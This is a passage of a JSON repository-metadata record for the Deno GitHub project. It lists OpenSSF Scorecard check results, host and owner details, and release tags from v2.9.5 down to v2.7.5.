topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51